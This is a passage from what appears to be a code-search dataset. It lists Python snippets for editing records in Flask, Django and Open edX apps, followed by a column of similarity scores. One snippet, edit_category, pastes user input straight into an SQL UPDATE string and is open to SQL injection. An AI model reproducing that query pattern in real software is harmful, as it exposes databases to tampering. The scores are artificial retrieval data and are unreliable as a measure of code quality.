\\\n filter_by(id=catalog_item_id).one()\n if request.form['name']:\n edited_item.name = request.form['name']\n if request.form['description']:\n edited_item.description = request.form['description']\n if request.form['price']:\n edited_item.price = request.form['price']\n session.add(edited_item)\n session.commit()", "def put(self, request, pk):\n return self.post(request, pk)", "def approve(request, course_id, field):\r\n\r\n for key in request.POST:\r\n if key == 'op' or key == 'field':\r\n continue\r\n problem_id, answer, pk = request.POST.getlist(key)\r\n problem_key = course_id.make_usage_key_from_deprecated_string(problem_id)\r\n # Can be optimized - sort the delete list by problem_id, and load each problem\r\n # from the database only once.\r\n problem_in_mod = XModuleUserStateSummaryField.objects.get(field_name=field, usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_mod.value)\r\n hint_to_move = problem_dict[answer][pk]\r\n del problem_dict[answer][pk]\r\n problem_in_mod.value = json.dumps(problem_dict)\r\n problem_in_mod.save()\r\n\r\n problem_in_hints = XModuleUserStateSummaryField.objects.get(field_name='hints', usage_id=problem_key)\r\n problem_dict = json.loads(problem_in_hints.value)\r\n if answer not in problem_dict:\r\n problem_dict[answer] = {}\r\n problem_dict[answer][pk] = hint_to_move\r\n problem_in_hints.value = json.dumps(problem_dict)\r\n problem_in_hints.save()", "def edit(self, *args, **kw):\n tmpl_context.widget = self.edit_form\n #pks = self.provider.get_primary_fields(self.model)\n \n log.debug(\"soyRomperLB= %s\" %kw)\n\n ###########################################\n pks = self.provider.get_primary_fields(self.model)\n \n ###########################################\n kw = {}\n for i, pk in enumerate(pks):\n kw[pk] = args[i]\n value = self.edit_filler.get_value(kw)\n value['_method'] = 'PUT'\n return dict(value=value, model=self.model.__name__, pk_count=len(pks))", "def editCategory(category_id):\n\n edited_category = session.query(Category).filter_by(id=category_id).first()\n if edited_category.user_id != login_session['user_id']:\n flash(\"You are authorised to Edit category created by You only!\")\n\n return redirect(url_for(\"showCatalog\"))\n\n if request.method == 'POST':\n if request.form['name'] != '':\n edited_category.name = request.form['name']\n session.add(edited_category)\n session.commit()\n flash('Category Successfully Edited %s' % edited_category.\n name)\n return redirect(url_for('showCatalog'))\n else:\n flash(\"Error editing category!\")\n return render_template('editCategory.html',\n category=edited_category)\n else:\n return render_template('editcategory.html',\n category=edited_category)", "def edit_category(self, category_id, category_name, parent_id):\n # [todo] - all parameters except category_id optional, fill others with\n # current values\n\n # [todo] - validate category_id\n # [todo] - validate new values\n\n # open a cursor\n cur = self.get_cursor()\n\n stmt = \"UPDATE categories \" + \\\n \"SET parent_id='{0}', \".format(parent_id) + \\\n \"category_name='{0}' \".format(category_name) + \\\n \"WHERE category_id={0}\".format(category_id)\n\n cur.execute(stmt)\n\n # close the cursor\n self.close_cursor()", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'lesson-edit', {'key': key}):\n return\n\n if not CourseOutlineRights.can_edit(self):\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': 
key})\n return\n\n course = courses.Course(self)\n lesson = course.find_lesson_by_id(None, key)\n if not lesson:\n transforms.send_json_response(\n self, 404, 'Object not found.', {'key': key})\n return\n\n payload = request.get('payload')\n updates_dict = transforms.json_to_dict(\n transforms.loads(payload), self.SCHEMA_DICT)\n\n lesson.title = updates_dict['title']\n lesson.unit_id = updates_dict['unit_id']\n lesson.objectives = updates_dict['objectives']\n lesson.video = updates_dict['video']\n lesson.notes = updates_dict['notes']\n lesson.activity_title = updates_dict['activity_title']\n lesson.activity_listed = updates_dict['activity_listed']\n lesson.now_available = not updates_dict['is_draft']\n\n activity = updates_dict.get('activity', '').strip()\n errors = []\n if activity:\n lesson.has_activity = True\n course.set_activity_content(lesson, activity, errors=errors)\n else:\n lesson.has_activity = False\n fs = self.app_context.fs\n path = fs.impl.physical_to_logical(course.get_activity_filename(\n lesson.unit_id, lesson.lesson_id))\n if fs.isfile(path):\n fs.delete(path)\n\n if not errors:\n assert course.update_lesson(lesson)\n course.save()\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def case_detail_update_view(request, pk):\n issue = _get_issue(request, pk)\n serializer = IssueDetailSerializer(data=request.data, instance=issue, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({\"issue\": IssueDetailSerializer(issue).data})", "def test_update_enrollment_term(self):\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\n pass", "def bulk_beta_modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n action = request.GET.get('action')\r\n identifiers_raw = request.GET.get('identifiers')\r\n identifiers = _split_input_list(identifiers_raw)\r\n email_students = request.GET.get('email_students') in ['true', 'True', True]\r\n auto_enroll = request.GET.get('auto_enroll') in ['true', 'True', True]\r\n results = []\r\n rolename = 'beta'\r\n course = get_course_by_id(course_id)\r\n\r\n email_params = {}\r\n if email_students:\r\n email_params = get_email_params(course, auto_enroll=auto_enroll)\r\n\r\n for identifier in identifiers:\r\n try:\r\n error = False\r\n user_does_not_exist = False\r\n user = get_student_from_identifier(identifier)\r\n\r\n if action == 'add':\r\n allow_access(course, user, rolename)\r\n elif action == 'remove':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"Unrecognized action '{}'\".format(action)\r\n ))\r\n except User.DoesNotExist:\r\n error = True\r\n user_does_not_exist = True\r\n # catch and log any unexpected exceptions\r\n # so that one error doesn't cause a 500.\r\n except Exception as exc: # pylint: disable=broad-except\r\n log.exception(\"Error while #{}ing student\")\r\n log.exception(exc)\r\n error = True\r\n else:\r\n # If no exception thrown, see if we should send an email\r\n if email_students:\r\n send_beta_role_email(action, user, email_params)\r\n # See if we should autoenroll the student\r\n if auto_enroll:\r\n # Check if student is already enrolled\r\n if not CourseEnrollment.is_enrolled(user, course_id):\r\n CourseEnrollment.enroll(user, course_id)\r\n\r\n finally:\r\n # Tabulate the action result of this email address\r\n 
results.append({\r\n 'identifier': identifier,\r\n 'error': error,\r\n 'userDoesNotExist': user_does_not_exist\r\n })\r\n\r\n response_payload = {\r\n 'action': action,\r\n 'results': results,\r\n }\r\n return JsonResponse(response_payload)", "def test_edit_category(self):\n self.signup('Bo', 'Theo', 'Bo_theo5@example.com', 'Bo1995', 'Bo1995')\n self.login('Bo_theo5@example.com', 'Bo1995')\n self.dashboard()\n self.category('Breakfast')\n self.dashboard()\n rv = self.edit_category('JunkFood')\n self.assertIn(b'Category successfully updated', rv.data)", "def get_d3_section_grade_distrib(course_id, section):\r\n\r\n # Retrieve course object down to problems\r\n course = modulestore().get_course(course_id, depth=4)\r\n\r\n problem_set = []\r\n problem_info = {}\r\n c_subsection = 0\r\n for subsection in course.get_children()[section].get_children():\r\n c_subsection += 1\r\n c_unit = 0\r\n for unit in subsection.get_children():\r\n c_unit += 1\r\n c_problem = 0\r\n for child in unit.get_children():\r\n if (child.location.category == 'problem'):\r\n c_problem += 1\r\n problem_set.append(child.location)\r\n problem_info[child.location] = {\r\n 'id': child.location.to_deprecated_string(),\r\n 'x_value': \"P{0}.{1}.{2}\".format(c_subsection, c_unit, c_problem),\r\n 'display_name': own_metadata(child).get('display_name', ''),\r\n }\r\n\r\n # Retrieve grade distribution for these problems\r\n grade_distrib = get_problem_set_grade_distrib(course_id, problem_set)\r\n\r\n d3_data = []\r\n\r\n # Construct data for each problem to be sent to d3\r\n for problem in problem_set:\r\n stack_data = []\r\n\r\n if problem in grade_distrib: # Some problems have no data because students have not tried them yet.\r\n max_grade = float(grade_distrib[problem]['max_grade'])\r\n for (grade, count_grade) in grade_distrib[problem]['grade_distrib']:\r\n percent = 0.0\r\n if max_grade > 0:\r\n percent = round((grade * 100.0) / max_grade, 1)\r\n\r\n # Construct tooltip for problem in grade distibution view\r\n tooltip = {\r\n 'type': 'problem',\r\n 'problem_info_x': problem_info[problem]['x_value'],\r\n 'count_grade': count_grade,\r\n 'percent': percent,\r\n 'problem_info_n': problem_info[problem]['display_name'],\r\n 'grade': grade,\r\n 'max_grade': max_grade,\r\n }\r\n\r\n stack_data.append({\r\n 'color': percent,\r\n 'value': count_grade,\r\n 'tooltip': tooltip,\r\n })\r\n\r\n d3_data.append({\r\n 'xValue': problem_info[problem]['x_value'],\r\n 'stackData': stack_data,\r\n })\r\n\r\n return d3_data", "def updateEMPStudyData(self, study_id, study_score, web_app_user_id):\n con = self.getMetadataDatabaseConnection()\n con.cursor().callproc('qiime_assets.update_emp_study_data', [study_id, study_score, web_app_user_id])", "def test_update_risk_profile_using_put(self):\n pass" ]
[ "0.5649238", "0.5606058", "0.55875236", "0.55865836", "0.5551528", "0.5505576", "0.5498032", "0.54429334", "0.52882886", "0.5234603", "0.5189582", "0.51738596", "0.5154065", "0.51239836", "0.5069172", "0.50602853", "0.50570875", "0.5049785", "0.50334764", "0.5032367", "0.49906343", "0.49727163", "0.49399975", "0.49341947", "0.49280974", "0.49197677", "0.49064013", "0.48912913", "0.48832947", "0.48533538", "0.4810963", "0.47757939", "0.4756292", "0.4756057", "0.47368336", "0.47362405", "0.4733177", "0.47172433", "0.47148114", "0.47120714", "0.4710436", "0.47081092", "0.47016716", "0.46988428", "0.46894684", "0.4687749", "0.4685078", "0.46829864", "0.4681345", "0.4673318", "0.46722642", "0.46709177", "0.46694964", "0.46684748", "0.46671283", "0.46627378", "0.46544915", "0.4649509", "0.4643104", "0.4637708", "0.46315333", "0.46299648", "0.4628174", "0.46201298", "0.46183878", "0.46168622", "0.46034425", "0.45966762", "0.45958343", "0.45875427", "0.45807683", "0.45759356", "0.45720783", "0.45707902", "0.45602053", "0.4552366", "0.4550419", "0.45490503", "0.45394975", "0.4539376", "0.45370802", "0.45334342", "0.45227453", "0.45210645", "0.4517062", "0.45127472", "0.45043373", "0.449582", "0.44833282", "0.4481509", "0.44798943", "0.44781792", "0.44756088", "0.4475221", "0.4467937", "0.44576988", "0.44509375", "0.44493997", "0.444596", "0.444491" ]
0.46072274
66
Explanation about grading and grade categories.
def about(request, pk=None):
    if pk and get_grouptype('3') in request.user.groups.all():
        ts = get_object_or_404(TimeSlot, pk=pk)
    else:
        ts = get_timeslot()
    return render(request, "results/about_grades.html", {
        'scores': CategoryAspectResult.ResultOptions,
        "categories": GradeCategory.objects.filter(TimeSlot=ts),
        'ts': ts,
    })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_knowledge_category_terms(self):\n return # osid.grading.GradeQueryInspector", "def test_classify_grade(self):\n\t\ts = Student_Analytics()\n\t\tself.assertEqual(s.classify_grade(5.00),\"A+\")", "def what_is_the_grade(self):\n\t\treturn_dict = {\n\t\t\t'section_title': self.title, \n\t\t\t'section_weight': self.weight,\n\t\t\t'grade_value' : self.current_grade_value,\n\t\t\t'comment_text' : self.current_comment_text,\n\t\t\t'default_comments_text' : self.current_default_comment_text,\n\t\t\t'example_comments_text' : self.current_example_comment_text,\n\t\t\t'is_complete': self.is_complete\n\t\t}\n\n\t\treturn return_dict", "def category(self) -> PracticeCategory:\n return PracticeCategory.DEXTERITY", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def test_a_grade(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Correct'})\r\n self.check_grade_percent(1.0)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'A')", "def bmi_categories():\n # Variable to ensure PEP8 convention pass (amount of characters in line)\n your_bmi = \"your BMI Category is \"\n # Result to user in age below 18\n if int(age) < 18:\n \"\"\"\n If age of user is below 18\n \"\"\"\n if float(bmi) <= 18.5:\n print(f\"{name.capitalize()} {your_bmi}underweight\")\n elif float(bmi) >= 18.5 and float(bmi) <= 24.9:\n print(f\"{name.capitalize()} {your_bmi}normal\")\n elif float(bmi) >= 25 and float(bmi) <= 29.9:\n print(f\"{name.capitalize()} {your_bmi}overweight\")\n else:\n print(f\"{name.capitalize()} {your_bmi}obesity\")\n # Else result to user in age is over 18\n else:\n \"\"\"\n If age of user is equal or over 18 - adults\n \"\"\"\n if float(bmi) <= 16:\n print(f\"{name.capitalize()} {your_bmi}Severe Thinness\")\n elif float(bmi) >= 16 and float(bmi) <= 17:\n print(f\"{name.capitalize()} {your_bmi}Moderate Thinness\")\n elif float(bmi) >= 17 and float(bmi) <= 18.5:\n print(f\"{name.capitalize()} {your_bmi}Mild Thinness\")\n elif float(bmi) >= 18.5 and float(bmi) <= 25:\n print(f\"{name.capitalize()} {your_bmi}Normal\")\n elif float(bmi) >= 25 and float(bmi) <= 30:\n print(f\"{name.capitalize()} {your_bmi}Overweight\")\n elif float(bmi) >= 30 and float(bmi) <= 35:\n print(f\"{name.capitalize()} {your_bmi}Obese Class I\")\n elif float(bmi) >= 35 and float(bmi) <= 40:\n print(f\"{name.capitalize()} {your_bmi}Obese Class II\")\n else:\n print(f\"{name.capitalize()} {your_bmi}Obese Class III\")", "def calc_grade(self, average):\n if 95 <= average:\n return 'S'\n elif 90 <= average:\n return 'A'\n elif 80 <= average:\n return 'B'\n elif 70 <= average:\n return 'C'\n elif 60 <= average:\n return 'D'\n else:\n return 'F'", "def get_knowledge_category(self):\n if not self.has_knowledge_category():\n raise IllegalState()\n else:\n return Grade(self._get_grade_map(self._my_map['knowledgeCategoryId'])),", "def computeGrades(e1, e2, a):\n \n a = assignmentScores\n a.sort()\n i=0\n while i<10:\n sum+=sum a[i]\n avg = sum/10\n \n grade = ((e1 + e2) /2) * 0.4 + (avg) * 0.6\n \n return grade\n \n if grade >= 90 and grade <= 100:\n return(\"A\")\n \n elif grade >= 80 and grade < 90:\n return(\"B\")\n \n elif grade >= 70 and grade < 80:\n return(\"C\")\n \n elif grade >= 60 and grade < 70:\n return(\"D\")\n \n elif grade < 60:\n return(\"F\")", "def grade_calculate_grade(self):\n try:\n if 
int(self.root.ids.grade_input_grade.text) >= 85:\n grade = 'High Distinction'\n elif int(self.root.ids.grade_input_grade.text) >= 75:\n grade = 'Distinction'\n elif int(self.root.ids.grade_input_grade.text) >= 65:\n grade = 'Credit'\n elif int(self.root.ids.grade_input_grade.text) >= 50:\n grade = 'Pass'\n else:\n grade = 'Fail'\n self.root.ids.grade_output_label.text = 'Grade: ' + grade\n except ValueError:\n\n self.root.ids.grade_output_label.text = 'Invalid Grade'", "def college_selectivity():", "def lookup_relevant(score):\n category = \"\"\n if score > 2.0:\n category = \"RELEVANT\"\n elif score > 0.0:\n category = \"PARTIALLY RELEVANT\"\n else:\n category = \"NOT RELEVANT\"\n return category", "def test_avg_grade(self):\n\t\ts = Student_Analytics()\n\t\tself.assertEqual(s.classify_grade(s.avg_grade(3)),\"B\")", "def test_get_cat_score(self):\n classes = ['blue skin', 'pointy ears']\n negated_classes = []\n categories = ['ear feature', 'skin feature']\n\n categorical_score = self.annot_scorer._get_categorical_score(\n classes, negated_classes, categories,\n self.negation_weight, self.mock_ic_values\n )\n\n assert categorical_score == 0.7002519289078384", "def __age_categorize(self, age):\r\n # Baby age category - most at risk, highest categorical denomination\r\n if age <= 4:\r\n self.__age = 4\r\n # Youth age category - second most at risk\r\n elif 5 <= age <= 14:\r\n self.__age = 3\r\n # Adult age category - least at risk\r\n elif 15 <= age <= 64:\r\n self.__age = 1\r\n # Elderly age category - second least at risk\r\n else:\r\n self.__age = 2", "def test_category(self):\n # XXX identifiers would be groovy\n self.check_search(\n dict(category=u'36:self'), # trap\n [u'Ingrain'],\n 'simple category search, vs self',\n exact=True,\n )\n self.check_search(\n dict(category=u'14:target'), # protect\n [u'Conversion 2', u'False Swipe'],\n 'simple category search, vs target',\n exact=True,\n )\n\n # Multiple categories\n # sleep OR attack up\n self.check_search(\n dict(category=[u'29:self', u'15:target'], category_operator=u'any'),\n [u'Rest', u'Swagger'],\n 'multiple category search (OR)',\n exact=True,\n )\n\n # sleep AND heal self\n self.check_search(\n dict(category=[u'29:self', u'13:self'], category_operator=u'all'),\n [u'Rest'],\n 'multiple category search (AND)',\n exact=True,\n )", "def grade(first, second, third):\n score = round((first + second + third) / 3, 1)\n score_secondary = str(score)\n plusminus = int(score_secondary[1])\n if score > 100:\n return \"Wrong input, friend.\"\n else:\n if score >= 90:\n if plusminus >= 5:\n return \"A+\"\n else:\n return \"A-\"\n elif score >= 80:\n if plusminus >= 5:\n return \"B+\"\n else:\n return \"B-\"\n elif score >= 70:\n if plusminus >= 5:\n return \"C+\"\n else:\n return \"C-\"\n elif score >= 60:\n if plusminus >= 5:\n return \"D+\"\n else:\n return \"D-\"\n else:\n return \"F\"", "def _repr_(self):\n return \"Category of hyperbolic models of {}\".format(self.base())", "def concept_categorization(self):\n dataset = pd.read_csv(\"data/Categorization data set.csv\", sep=\";\", header=None)\n dataset.columns = ['concept','word']\n\n cti = {}\n for i,c in enumerate(np.unique(dataset.concept.values)):\n cti[c] = i\n y_true = dataset.concept.apply(lambda x: cti[x]).values\n vs = []\n preds = [''] * dataset.shape[0]\n for ind,w in enumerate(dataset.word.values):\n try:\n vs.append(self.embeddings_index[w])\n except:\n preds[ind] = 0 \n km = KMeans(n_clusters=22, random_state=0)\n km.fit(np.array(vs).astype(np.float32))\n for ind,w in 
enumerate(dataset.word.values):\n if preds[ind] == '':\n preds[ind] = km.predict(np.array([self.embeddings_index[w]]))[0]\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, preds)\n #purity score\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix)", "def get_level_terms(self):\n return # osid.grading.GradeQueryInspector", "def grade(self):\n if round(self.numAvg,0) >= 70:\n return round(self.numAvg,0)\n elif self.PassSummer:\n return 70\n elif round(self.numAvg,0) >= 55 and not self.PassSummer:\n return round(self.numAvg,0)\n else:\n return 55", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def describe_detailed(self) -> str:\n one_to_one = []\n one_to_many = []\n many_to_one = []\n many_to_many = []\n cats_a: set[Category] = set()\n cats_b: set[Category] = set()\n for rule in self.rules:\n cats_a.update(rule.factors_categories_a.keys())\n cats_b.update(rule.factors_categories_b.keys())\n if rule.cardinality_a == \"one\" and rule.cardinality_b == \"one\":\n one_to_one.append(rule)\n elif rule.cardinality_a == \"one\":\n one_to_many.append(rule)\n elif rule.cardinality_b == \"one\":\n many_to_one.append(rule)\n else:\n many_to_many.append(rule)\n\n cat_a, cat_b = self.categorization_a.name, self.categorization_b.name\n\n r = f\"# Mapping between {cat_a} and {cat_b}\\n\\n\"\n r += \"## Simple direct mappings\\n\\n\"\n r += \"\\n\".join(\n rule.format_human_readable(categorization_separator=\"\")\n for rule in one_to_one\n )\n r += \"\\n\\n\"\n r += f\"## One-to-many mappings - one {cat_a} to many {cat_b}\\n\\n\"\n r += \"\\n\".join((rule.format_human_readable()) for rule in one_to_many)\n r += \"\\n\\n\"\n r += f\"## Many-to-one mappings - many {cat_a} to one {cat_b}\\n\\n\"\n r += \"\\n\".join((rule.format_human_readable()) for rule in many_to_one)\n r += \"\\n\\n\"\n r += f\"## Many-to-many mappings - many {cat_a} to many {cat_b}\\n\\n\"\n r += 
\"\\n\".join((rule.format_human_readable()) for rule in many_to_many)\n r += \"\\n\\n\"\n\n r += \"## Unmapped categories\\n\\n\"\n cats_missing_a = set(self.categorization_a.values()) - cats_a\n cats_missing_b = set(self.categorization_b.values()) - cats_b\n r += f\"### {cat_a}\\n\"\n r += \"\\n\".join(sorted(str(x) for x in cats_missing_a)) + \"\\n\\n\"\n r += f\"### {cat_b}\\n\"\n r += \"\\n\".join(sorted(str(x) for x in cats_missing_b)) + \"\\n\\n\"\n\n return r", "def getCategory():", "def on_briefing(self) -> Optional[Grade]:\n pass", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def category(self) -> PracticeCategory:\n return PracticeCategory.PERFORMANCE", "def get_grade(course_det):\n return course_det[1]", "def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]", "def categories(self):\n pass", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def remove_category(self,cat):\n if isinstance(cat,Category):\n cat = cat.name\n if cat.name in self.__categories:\n del self.__categories[cat.name]\n return True\n else:\n warnings.warn('Category \\'{}\\' is not in Gradebook.'.format(cat.name))\n return False", "def categories(self):\r\n return self.q(css='span.rubric-category').text", "def category_reducer(category):\n if not \"--\" in category:\n if category in BAD_CATEGORIES:\n return \"Unknown\"\n return category\n\n main, sub = category.split(\"--\")\n\n main = main.strip()\n if main in [\"Science\"]:\n return sub.strip()\n else:\n return main", "def get_grade(self) -> int :\n return self.grade", "def the_cats_ass():\n return __cat_whisperer()[Cat.ASS]", "def average_grade(self):\n grade_sum = 0\n grades_length = 0\n for 
c in self.courses_grades:\n if c[1] != \"-\":\n grade_sum += int(c[1])\n grades_length += 1\n average = grade_sum / grades_length\n return average", "def test_get_cat_score_w_negation(self):\n classes = ['blue skin', 'pointy ears']\n negated_classes = ['large ears', 'increased pigmentation']\n\n categories = ['ear feature', 'skin feature']\n\n categorical_score = self.annot_scorer._get_categorical_score(\n classes, negated_classes, categories,\n self.negation_weight, self.mock_ic_values\n )\n\n assert categorical_score == 0.7201759238096741", "def fk_grade(self, doc):\n num_sentences = _get_num_sentences(doc)\n num_words = _get_num_words(doc)\n num_syllables = _get_num_syllables(doc)\n if num_sentences == 0 or num_words == 0 or num_syllables == 0:\n return 0\n return (\n (11.8 * num_syllables / num_words)\n + (0.39 * num_words / num_sentences)\n - 15.59\n )", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def categoria(cad):\n \n # Vai ser usado o tuplo que contem todas as informacoes sobre as categorias das entidades definido nas linhas de codigo iniciais.\n # Sao acedidas as informacoes no indice 0 (Digito Inicial) e 1 (Categoria). \n \n # Caso o primeiro caracter nao seja um algarismo, chamamos a atencao ao utilizador para o erro. 
Caso seja, percorremos o tuplo com as informacoes sobre as categorias das entidades, e devolvemos a entidade correspondente ao digito inicial.\n \n \n if '0' <= cad[0] <= '9':\n\n c1=eval(cad[0])\n\n for e in t_cat_ent:\n \n if c1==e[0]:\n return e[1]\n \n \n else:\n raise ValueError ('function categoria(): O primeiro digito da cadeia nao e valido')", "def chapter_grades(self):\n return self.course_grade.chapter_grades", "def Categories():\n cat = {\n \t \"Featured\": 0,\n \t \"All\": 1,\n \t \"Collectibles\": 2,\n \t \"Clothing\": 3,\n \t \"BodyParts\": 4,\n \t \"Gear\": 5,\n \t \"Models\": 6,\n \t \"Plugins\": 7,\n\t \"Decals\": 8,\n \t \"Audio\": 9,\n \t \"Meshes\": 10,\n\t \"Accessories\": 11,\n\t \"AvatarAnimations\": 12,\n\t \"CommunityCreations\": 13,\n\t \"Video\": 14,\n\t \"Recommended\": 15\n }\n return cat", "def rating(grade_count):\r\n if grade_count == 0 :\r\n grade = 7\r\n else:\r\n grade = 2\r\n \r\n return grade", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def calculate_safety(data):\n\n\tgood_actions = data['actions'].apply(lambda x: ast.literal_eval(x)[0])\n\tgood_ratio = good_actions.sum() * 1.0 / (data['initial_deadline'] - data['final_deadline']).sum()\n\n\tif good_ratio == 1: # Perfect driving\n\t\tprint \"Perfect Driving!!\"\n\telse:\n\t\tprint \"Imperfect Driving :(\"\n\t \n\tmajor_acc = data['actions'].apply(lambda x: ast.literal_eval(x)[4]).sum()\n\tminor_acc = data['actions'].apply(lambda x: ast.literal_eval(x)[3]).sum()\n\tmajor_vio = data['actions'].apply(lambda x: ast.literal_eval(x)[2]).sum()\n\tminor_vio = data['actions'].apply(lambda x: ast.literal_eval(x)[1]).sum()\n\n\tprint \"Major accident = {}, Minor accident = {}, Major violation = {}, Minor violation = {}\"\\\n\t.format(major_acc, minor_acc, major_vio, minor_vio)\n\n\tif major_acc > 0: # Major accident\n\t\tgrade = \"F\"\n\telif minor_acc > 0: # Minor accident\n\t\tgrade = \"D\"\n\telif major_vio > 0: # Major violation\n\t\tgrade = \"C\"\n\telse: # Minor violation\n\t\tif minor_vio >= len(data)/2: # Minor violation in at least half of the trials\n\t\t\tgrade = \"B\"\n\t\telse:\n\t\t\tgrade = \"A\"\n\n\tprint \"Grade: {}\".format(grade)", "def readability(target_text):\n\n nb1 = total_words(target_text)\n nb2 = total_phrases(target_text)\n nb3 = total_syllables(target_text)\n k1 = 206.835\n k2 = 1.015\n k3 = 84.6\n score = round((k1 - k2 * (nb1 / nb2) - k3 * (nb3 / nb1)), 2)\n\n print_text = \"Reading level of\"\n if score > 90:\n level = '5th Grade'\n elif score > 80:\n level = '6th Grade'\n elif score > 70:\n level = '7th Grade'\n elif score > 60:\n level = '8-9th Grade'\n elif score > 50:\n level = '10-12th Grade'\n elif score > 30:\n level = 'College student'\n else:\n level = 'Gollege Graduate'\n\n print('Total words:', nb1)\n print('Total phrases:', nb2)\n print('Total syllables:', nb3)\n print('')\n print('Readability score:', score)\n print(print_text, level)", "def test_grade(self):\r\n # Sample variables x and y in the range [-10, 10]\r\n sample_dict = {'x': (-10, 10), 'y': (-10, 10)}\r\n\r\n # The expected solution is numerically equivalent to x+2y\r\n problem = self.build_problem(sample_dict=sample_dict,\r\n num_samples=10,\r\n tolerance=0.01,\r\n answer=\"x+2*y\")\r\n\r\n # Expect an equivalent formula to be marked correct\r\n # 2x - x + y + y = x + 2y\r\n input_formula = \"2*x - x + y + y\"\r\n self.assert_grade(problem, input_formula, \"correct\")\r\n\r\n # Expect an incorrect formula to be 
